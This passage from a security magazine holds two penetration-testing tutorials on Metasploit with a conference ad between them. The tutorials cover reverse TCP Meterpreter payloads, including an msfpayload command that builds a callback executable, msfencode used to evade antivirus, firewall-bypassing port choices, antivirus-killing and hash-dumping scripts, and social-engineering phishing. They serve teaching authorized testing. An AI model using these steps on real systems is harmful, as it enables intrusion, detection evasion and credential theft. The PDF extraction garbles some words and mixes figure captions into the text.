you are using a reverse TCP payload do not for-get to turn off your local firewall and check your router to see if it is blocking any port, otherwise you will not see a shell waiting for your com-mands if the exploit was successful. If you are attacking a system on the Internet, you will have to use your external IP address in the LHOST op-tion. You should use port 80, 53, 8080 or port 443 in the LPORT option because if the target ma-chine is behind a firewall and the outbound traffic is filtered, ports 80, 53, 800 and 443 would likely be allowed for outgoing connections, else the vic-tim’s local firewall may drop all unintended pack-ets which go through any port other than 80, 53, 8080 or 443. Do not forget to configure your rout-er to redirect all incoming traffic on ports 443, 53, 8080 and 80 to your local IP address (attacking machine).
Search for Allowed Ports
Automatically
If you find it hard to locate a port that is allowed through the firewall, Metasploit offers the command search ports.
This payload searches for open ports by trying ev-ery available port connect-ing outbound until it finds an open one. This process may take quite a long time. If you manage to open one or more sessions you can list your active sessions by executing sessions -l. To
interact with an active ses-sion, issue the command
sessions -i num, where num
is the number of the ses-sion. A Meterpreter shell will open and if we enter shell,
we will jump into a windows command line shell.
Fuzzing
Fuzzing or fuzz testing is an automated or semi-au-tomated black box software testing technique that auto-mates the process of data
Figure 13. Available targets for SMB exploit
generation and injection to discover bugs, crashes, maximum overflow capacities and memory leaks in software applications, protocols, file formats and computer systems by providing invalid, unexpected and random data to the inputs of the system.
Metasploit contains numerous fuzzer modules that can be used to test software applications, computer systems and protocols. To quickly see a list of available fuzzers run msfconsole, type info auxiliary/fuzzers/ and hit tab button (Listing 2).
FTP Pre- authentication and
Post-authentication Fuzzing
The ftp_pre_post fuzzer module will connect to a
FTP server and perform pre- authentication and post-authentication fuzzing. To select this fuzzer module, execute use auxiliary/fuzzers/ftp/ftp_ pre_post. Set rhosts and run the module or type
show options first to configure the module (Figure 14).
HTTP Form Field Fuzzer
Metasploit provides us with a http_form_field fuzz-er module. This module will grab all fields from a form, and launch a series of POST actions, fuzz-ing the contents of the form fields and headers. To use this module type use auxiliary/fuzzers/ http/http_form_field.
Meterpreter
Meterpreter is an advanced, stealthy, powerful and exten-sible post exploitation tool that uses in-memory DLL injection stagers and is ex-tended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API.
Figure 14. Running ftp_pre_post fuzzer
Listing 2. Command executed in the attacker machine
msf > info auxiliary/fuzzers/ info auxiliary/fuzzers/dns/dns_fuzzer info auxiliary/fuzzers/ftp/client_ftp info auxiliary/fuzzers/ftp/ftp_pre_post info auxiliary/fuzzers/http/http_form_field info auxiliary/fuzzers/http/http_get_uri_long info auxiliary/fuzzers/http/http_get_uri_strings info auxiliary/fuzzers/smb/smb2_negotiate_corrupt info auxiliary/fuzzers/smb/smb_create_pipe info auxiliary/fuzzers/smb/smb_create_pipe_corrupt info auxiliary/fuzzers/smb/smb_negotiate_corrupt info auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt info auxiliary/fuzzers/smb/smb_tree_connect info auxiliary/fuzzers/smb/smb_tree_connect_corrupt info auxiliary/fuzzers/smtp/smtp_fuzzer info auxiliary/fuzzers/ssh/ssh_kexinit_corrupt info auxiliary/fuzzers/ssh/ssh_version_15 info auxiliary/fuzzers/ssh/ssh_version_2 info auxiliary/fuzzers/ssh/ssh_version_corrupt info auxiliary/fuzzers/tds/tds_login_corrupt info auxiliary/fuzzers/tds/tds_login_username info auxiliary/fuzzers/wifi/fuzz_beacon info auxiliary/fuzzers/wifi/fuzz_proberesp msf > info auxiliary/fuzzers/
A GUIDE TO METASPLOIT
Useful Meterpreter third party scripts
Once you have successfully compromised a target, you could use the scripts below within a Meterpreter shell in order to retrieve valuable information. To run one of the scripts below enter run followed by the name of the script, for ex. run winenum.
• Grab system information and the entire registry with scraper script
• Dump tokens, hashes and more with winenum • Enumerate system information through wmic
using remotewinenum
• Add entries to the Windows hosts file using
hostsedit
• Get the local subnet mask of the victim with script get_local_subnets
• Disable most antivirus programs running as a service with killav script
• gettelnet script will enable telnet • Enable RDP with script getgui
• Disable security measures such as antivirus, firewall, and more with getcountermeasure • Check to see if you exploited a virtual machine,
checkvm
Metasploit Database
Every time we are running a module, the Metasploit database is being updated with data. This is an amazing feature of Metasploit, because it is im-possible to remember all this information. There are specific commands to pull information from the Metasploit database. Some of them we have al-ready seen them during our tests.
Pull information
• hosts command will list all of the hosts in the database
• notes command will output the notes that Metasploit has for each host
• services command will display the identified services on the target machines
• vulns will list all of the discovered vulnerabili-ties for each target machine
• creds will list all stored credentials
To get more help and details about each com-mand you can issue the comcom-mand in msfconsole, followed by parameter -h.
Administering Metasploit Databases
There are also commands to administer databases: • db _ create
username:passwd@localhost/db-name, create a new database
• db _ connect
username:passwd@localhost/db-name, connect to a database
• db _ disconnect, disconnect from database
• db _ destroy
username:passwd@localhost/db-name, to delete the specified database
Conclusion
Although it matters what tools you are using to conduct your penetration testing, it is not all about the tools. Penetration testing requires you to think outside of the box. The key to a successful pen-etration test is being able to connect and correlate the information that you have managed to collect. There are several different ways to break into the systems and a variety of tools to use but you have to be patient, persistent and creative. Metasploit is an amazing tool with many benefits that will help you achieve your goal but you will not accomplish anything without hard work and study. And remem-ber, you cannot just download Metasploit and start scanning and exploiting random targets on the In-ternet. You need write permission from the owner or administrator of the system to conduct a pen-etration test against the system. Be careful other-wise you may end up behind bars.
GEORGE KARPOUZAS
George Karpouzas is a co-found-er of WEBNETSOFT (http://webnet-soft.gr), a software development and IT Services company. He is work-ing as a software developer for the past seven years. He is a security re-searcher and an information securi-ty consultant for WEBNETSOFT, spe-cializing in application security. He holds a bache-lor’s degree in computer science from Athens Univer-sity of Economics and Business. You can also find the answers to any security questions on his blog http:// securityblog.gr.
Organized by
R (http://journal.cybertimes.in)Sponsored by
(www.sedulitygroups.com)Chief Guest:
Guest of Honour:
l
Dr. Gulshan Rai
,
Director General, CERT-In, MIT, India.l
Justice Talwant Singh
,
CBI Judge, Delhi, India.l
Mr. Rajiv P Saxena,
Deputy Director General, NIC, Govt. of India. lShri V.K. Panchal,
(Scientist-G, DTRL, DRDO).http://journal.cybertimes.in Ph: +91-9312903095
*Conditions Apply.
International Conference On
“Diversifying Trends in
Technology & Management”
“Diversifying Trends in
Technology & Management”
6 - 7 April’ 2013
at
Indian Institute of Technology (IIT - Delhi)
New Delhi, India.
6 - 7 April’ 2013
at
Indian Institute of Technology (IIT - Delhi)
New Delhi, India.
CTIJTM
Important dates
thLast date of Full Paper Submission: 5 March’ 2013
Last Date of Full Paper Submission: 15 March’2013 (With Late Fee)
thFor More Details Visit “http://journal.cybertimes.in”
*Conditions Apply.A GUIDE TO METASPLOIT
Metasploit:
An Introduction
Metasploit Framework is a tool for developing and executing
exploit code against a remote target machine. It provides end to
end framework for penetration testing for: Information gathering,
Vulnerability Scanning, Pre Exploitation, Post Exploitation, Exploit
Development.
M
etasploit greatest advantage is that it is open source and freely extendable. You can customize it by including your exploit and payloads as per your need. A security pentest-er can check the custom made applications specif-ic to an enterprise against his customized exploits and payloads. If a security researcher crafts a new attack, then a custom made payload can carry out most of the attack purpose.Today, software vulnerability advisories are often accompanied by a third party Metasploit exploit module that highlights the exploitability, risk, and remediation of that particular bug
Architecture of Metasploit
For the sake of simplicity, we shall concentrate only on the Interface and the module part of Metasploit for this article (Figure 1).
Platform Used for demonstration
We are currently demonstrating Metasploit fea-tures with the help of Backtrack OS. All screen
shots of working of metasploit are taken from there. We have VMware image of Backtrack 5 R1 OS with this configuration: Figure 2.
We login in Backtrack 5 R1 OS with credentials as root and password as toor. Type startx to load the GUI screen of Backtrack.5.
Metasploit is typically found on this location in Backtrack OS.
Metasploit Interfaces
• Msfconsole: The console and the most power-ful of all interfaces. Can support multiple ses-sions
• Msfcli: Single command interface. Supports only one session
• Msfd: Provides a network based interface to msfconsole
• Msfweb: This is web based interface.
Good Practices for using Metasploit
Updating via Msfupdate
It is always beneficial to have updated Metasploit framework before beginning to work on it. This way we can stay current for all the exploits and payloads offered for the framework. We use the Msfupdate utility to update the Metasploit framework.
Here is the path for the Msfupdate utility: Figure 3.
Port scanning via Nmap
It is good idea to identify the open ports and the services running on them using a versatile tool such as nmap. It gives us the clearer picture on what areas and ports we need to focus our ener-gy to run the exploit. Knowing the service version number helps us greatly to select the known ex-ploits available in Metasploit with their associated payloads.
Here is an example of the nmap scan: Figure 4.
Meterpreter: Metasploit’s Payload
A payload is the piece of software that lets you control a computer system after it’s been ex-ploited. It is typically attached to the exploit. Me-terpreter is the best known payload of Metasploit.
Meterpreter enables users to control the screen of a device using VNC and to browse, upload and download files.
What typically payloads allow you to do after
execution of exploit?
• Add a new user to victim machine
• Opening the command prompt on a specif-ic port of vspecif-ictim system and running the com-mands from there
• Reverse connecting a command shell to issue the commands from your end
What is a meterpreter?
Meterpreter is short form for “Metasploit Interpret-er” which is a powerful payload allowing you to do many things on the compromised system such as manipulating local files in system etc. Used for write and execute advanced commands on the de-fault shell of the victim system.
What makes Meterpreter so powerful?
Meterpreter runs ‘’in memory’’ of the exploited process which makes it very quiet and stealthy to evade detection by the antivirus and other analy-sis tools. It leaves very small traces in the com-promised system while in turn giving the attack-er maximum space to carry out activities such as navigating local file system, port forwarding, tunnel connection from victim machine to other system, push entries in registry, modify network configuration, download confidential files etc. In short, once you get the meterpreter running you can pretty much do anything related to a hacked system.
How this is achieved?
Meterpreter achieves this by providing API on which programmers can write their specific exten-sions which can be uploaded as shared DLL’s run-ning within the memory of the exploited process.
How this is helpful to pentesters’?
Metasploit using meterpreter avoids executing a new process or sub-process and maintains the
A GUIDE TO METASPLOIT
stealth-ness of the attack. It comes with built-in commands and extensions that allow obtaining system information, configuring port forwarding, as well as uploading and executing binaries and DLLs. It basically evades detection largely by any analysis tool.
Running Metasploit
This is the path for running metasploit from back-track OS (Figure 5).
Once started, we get the msfconsole as follows: Figure 6.
Methodology for running an exploit from
msfconsole commands
• show exploits: This command will give you the extensive list of the exploit available in Metasploit (Figure 7).
• use <exploit name>: Using the exploit for your victim machine
• show payloads: Gives out the name list of available payloads specific to exploit chosen (Figure 8).
• set PAYLOAD <payload>: Sets the payload which is actually executed after successful ex-ecution of your chosen exploit (Figure 9). • show OPTIONS: Lists out the options such as
RHOST, TARGET followed by its value associated with the selected exploit and payload (Figure 10). • set options : Sets the OPTIONS for the chosen
exploit and payload. Values are typically shown here for each option (Figure 11)
• exploit: Executes the Exploit against target (victim’s) system
If exploit executes successfully, then the payload embedded in it is injected into the victim machine to carry out the intended activity. If unsuccessful, then corresponding error message is shown.
Msfencode
Many times during payload execution, we come across ‘’’bad’’ characters such as Null (0X00) byte, new line characters which can be trapped by built in application which uses sanitization filters on re-ceived input. This utility helps us to encode the ex-ploit and get rid of bad characters to bypass those input filters. It also significantly reduces the dan-gers of being caught by IDS tool.
Figure 5. Run Metasploit
Figure 8. Available payloads
Figure 7. Available exploits Figure 6. The console
Figure 10. Options
Figure 11. Set the option Figure 9. An exectuted payload
Example
Suppose we are producing meterpreter execut-able met.exe as follows:
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.67 LPORT=4444 X > /var/www/met.exe
Created by msfpayload (http://www.metasploit.com). Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=192.168.1.67,LPORT=4444
Now, when we try to download this file from the “victim” PC, we get an error message because our antivirus has detected an intrusion attempt. Let us see what happens when we apply the en-coding techniques:
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.67 LPORT=4444 R | ./msfencode -t
exe > /var/www/metenc1.exe
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
Notice the size of the file changed from Length: 290 to size 318. The text marked in blue shows us that the attack has been successful.
How does it help the pentester?
Pentester has more control and flexibility for craft-ing his payloads and sent them across its target. He can now demonstrate more creativity to encap-sulate his payloads for delivering to destination host machine to achieve its exploit’s objective.
Automating the Pentest
We can completely automate a pen-test from scan-ning remote systems to identify vulnerabilities, and then launch exploits against these systems.
We have the following options to import recon-naissance data:
• db_import_nessus_nbe: Import an existing Nessus NBE output file
• db_import_nmap_xmlI: Import data from an existing Nmap XML output file
• db_nmap: Execute Nmap through the frame-work and store its results in the database The command db_autopwn, references the re-connaissance data, links it up with matching ex-ploit modules, selects exex-ploit modules based on open ports and launches the exploit modules against the matched targets.
Using db_autopwn
See Figure 12.
Auxiliary Module system
The Auxiliary module system is a collection of ex-ploits and modules that add to the core capabil-ity of the framework. They are basically suited for information gathering purposes. These are auto-mated scripts performing a certain task. We can specify single or multiple ranges to be targeted. Popular uses are in port scanning, fuzzers, DoS scripts etc.
Popular Auxillary Modules
• scanner/smb/version: Determine the operat-ing system version and service pack level of a Windows target system using SMB fingerprint-ing. Use info for more information
Figure 14. All modules with scanner/http Figure 13. Scanner/discovery/sweep_udp
A GUIDE TO METASPLOIT
• scanner/discovery/sweep_udp: Scans a single host or a specified range of hosts for UDP ser-vices, and decodes the results. Eg. Figure 13.
Searching Auxiliary modules
We can narrow down our search to a few modules when using search operator. E.g.. Search all mod-ules with scanner/http (Figure 14).
How it is helpful to pentesters?
The auxiliary module system allows excellent in-formation gathering activities, matching systems to available exploits, executing exploits, managing the multiple exploit sessions, and storing all of this information in a database.
Social Engineer Toolkit
This toolkit was created to fill the gap between the penetration testers’ and social engineering. This helps tremendously to craft a clever malicious file to trap innocent users to click on it. The interface is very simple to use. Just select the option no in the menu and we are good to go!
We can access the SET toolkit as follows: Figure 15.
We are greeted with SET toolkit splash screen as: Figure 16.
Now in this menu driven program, all we have to do is select our attack vector, craft it as per instruc-tion and send the link / email to the user. The inno-cent user when opens the link or attachment falls victim to our social engineering tricks and we have easy access to his system.
We can try all the options in the SET toolkit menu and follow the instructions accordingly to launch a successful attack t compromise the victim ma-chine.
How this is helpful to pentesters’?
Pentesters can now readily demonstrate to man-agement how an attacker with malicious intent can abuse the trust of the people of the organization to gain access to the most sensitive information. By exploiting and presenting the real world tests on phishing, it can be shown that social engineer-ing is the strongest threat to the organization. Its target is people, not the systems to gain access to confidentiality.
General Precautions for using Metasploit
Metasploit is no doubt a very powerful and handy tool for an effective and thorough penetration and exploit testing. But if used improperly, may result in very unpleasant situations where whole server might be forced to shut down during testing costing millions to an organization. Here are some good practices to follow whenever we are going for pen-etration and exploit testing.
• Proper backup: It is highly recommended that the backups must be taken before any pene-tration exercise is undertaken, else the loss of information and its unavailability for the time being might prove fatal to business if in case something goes wrong. It works as a second line of defense.
• Prior management approval: It is crucial that proper “written” authorization letter is obtained from management before proceeding for any exploit testing. This removes the burden of facing any legal lawsuits if in case things go wrong.
• Inform first, and then exploit: The good rule of thumb is to inform the senior management about the risk and ask their call on the issue. If you receive green signal to proceed with the exploitation part, obtain written approval and then demonstrate.
Figure 16. SET toolkit screen Figure 15. Access the SET toolkit
• Training: Security awareness is the strongest deterrent for any risk for valuable information leakage. Through the live demonstration of SET inform the IT and other office staff how to stay on guard by not falling victim to the social engineering methods.
Conclusion
Metasploit is helpful in determining if the given vul-nerability is actually exploitable or not. It lets us know if there actually a risk associated with the vulnerability which can be exploited. This auto-matically cleans out any instances of false positive which are typical feature of many automated scan-ners. Automated scanners don’t tell you if vulner-ability is a potential risk or not as they don’t check that against a known exploit. But metasploit does that. Hence, a better risk assessment judgment can be made using metasploit. Metasploit can also be frequently used by pentesters to demonstrate successfully the potential extent of damages that an attacker is capable of after successful break-in by or post exploitation activities. This can also help us to better rate the severity of the risks associated with the discovered vulnerability of the system.
MANASDEEP
Manasdeep – currently serves as a Security Analyst in the Security Assessment team at NII Consulting, Mum-bai. His work focuses on conducting Security Audits, Vulnerability Assessment and Penetration Testing for NII’s premier clients. He has flair in technical writing and shares his thoughts on his blog “Experiencing Comput-ing...” at http://manasdeeps.blogspot.in. He has also published information security paper(s) in Internation-al JournInternation-al of Computer Science and Information Securi-ty (IJCSIS) along with various seminar / conference pro-ceedings.He loves to apply innovation freely in his work to find more creative ways to address a given problem.
References
• http://www.metasploit.com/ • http://blog.metasploit.com/ • http://www.offensive-security.com/metasploit-unle-ashed/ • http://en.wikipedia.org/wiki/Metasploit_Project • http://www.metasploit.com/about/penetration-te-sting-basics/payload.jsp • http://www.offensive-security.com/metasploit-unle-ashed/ • http://insidetrust.blogspot.in/2010/08/hacking-tech-niques-using-msfencode-to.html• Metasploit Toolkit for Penetration Testing by David Maynor
• Metasploit: The Penetration Tester’s Guide by Da-vid Kennedy
